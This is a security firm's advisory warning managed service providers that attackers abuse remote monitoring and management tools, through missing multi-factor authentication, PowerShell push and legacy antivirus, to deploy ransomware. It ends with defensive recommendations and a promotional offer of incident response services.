Managed Service Providers (MSPs) that use Remote Monitoring and Management (RMM) tools without key security precautions expose themselves, and their clients, to a disaster of epic proportions.
Criminals have discovered a very lucrative new target in the ransomware war happening across the United States right now: Managed Services Providers, or MSPs as the industry calls them. MSPs are paid to keep business computers patched and users connected to the business applications that millions of small and mid-size businesses use every day. MSPs rely on RMM tools like ConnectWise Automate (formerly known as Labtech) and Continuum’s Command in order to effectively service dozens to hundreds of small businesses, each with dozens to hundreds of computers and users.
RMM helps MSPs ensure that their clients’ computers are patched, identify problems and get them fixed before they cause system outages, and service many more clients than could otherwise be managed through old-fashioned remote access tools and processes. RMM has had a tremendous impact on MSP profitability for the last few years, and the trend for MSPs to adopt more and more RMM features is set to rise dramatically.
However, MSPs are advised to slam the brakes on using RMM tools if they don’t have the proper security controls in place. If not, they risk complete destruction at the hands of hackers.
Lack of Multi-Factor Authentication (MFA)
Many RMM tools use a Software-as-a-Service model and allow login to the management console website from any public Internet connection. Furthermore, many offer Multi-Factor Authentication (MFA), including integrations with MFA providers like Duo and Okta. However, none of the RMM tools require MFA to function. Instead, RMM providers offer MFA as an option that is not enabled by default. Many MSPs have not enabled MFA and are not currently enforcing its use. Therefore, for many MSPs, compromise of RMM login credentials will allow attackers to log in from anywhere at any time. This has led to dozens of MSP and MSP client breaches in the last few months.
Compounding this issue is the fact that most RMM tools allow Windows PowerShell commands to be issued from the RMM administration console to any and all computers that have RMM agents installed. PowerShell is a very powerful administration tool that has been an unremovable part of Windows since Windows 7 was released. Any command that an administrator might run today can be crafted as a PowerShell script and sent out via the RMM tools so that all managed computers get the same set of instructions. PowerShell is used by attackers to download and execute ransomware encryption executables with names like RYUK, Sodinokibi, WannaCry, and others. We have seen very efficient use of PowerShell to deploy and execute ransomware attacks by attackers who know exactly how to navigate popular RMM tools and deploy payloads via PowerShell.
Finally, many MSPs are still using legacy, signature-based anti-virus (AV) software that cannot detect today’s polymorphic and otherwise advanced malware delivery mechanisms for ransomware and other threats. These legacy AV products may still have some effectiveness for stopping “commodity” level malware, adware, and spyware. However, they fail miserably when tested against ransomware strains and deployment systems used by Sodinokibi and RYUK ransomware family. Our data breach responders have seen dozens of examples of common AV products failing to stop ransomware from executing.
Each of these three conditions (lack of MFA, PowerShell execution, and commodity/legacy AV) by themselves are concerning. However, when these issues exist together and are leveraged by attackers to deploy ransomware, the results are devastating.
One victim MSP who engaged Ingalls Information Security to help respond to a ransomware outbreak had more than 90 clients with systems encrypted, with each computer requiring a $6,000 ransom payment in Bitcoin before data could be recovered. Although most systems had valid backups and could be restored, dozens had to have ransom payments made in order to get back data that was not backed up or had backups destroyed by the attackers during the attack.
In order to control the risks that MSPs face due to RMM tool capabilities and how attackers are using RMM to deploy ransomware, we recommend the following efforts be performed immediately in order to protect MSPs and their clients:
- Enable and enforce Multi-Factor Authentication on any and all RMM management accounts used for MSP service delivery.
- Prevent Powershell execution on ALL hosts where it is possible or limit Powershell usage to only specific, unique directories that are specified based on bare minimum requirements.
- Change passwords on RMM tools and rotate them regularly, ESPECIALLY if the MSP has not enabled MFA (for example if the MSP can’t comply with recommendation #1).
- Deploy next-generation endpoint protection that does NOT rely on signature-based detection of malware, and partner with a Managed Security Services Provider (MSSP) to collect and monitor logs and other data to identify attacks prior to payload deployment.
- Reduce RMM user accounts to the bare minimum and audit them regularly.
We at Ingalls Information Security hope that MSPs heed this very serious warning about RMM tool access by ransomware attackers. Unfortunately, we also expect more MSPs to suffer breaches.
We are ready to assist MSPs and their clients, in a rapid and discreet way that reduces impact through speed of resolution.
Contact us immediately if you are an MSP who has been attacked with ransomware, or your MSP has notified you that they have been hit. We have the expertise to resolve these types of attacks and get you back to normal as fast as possible.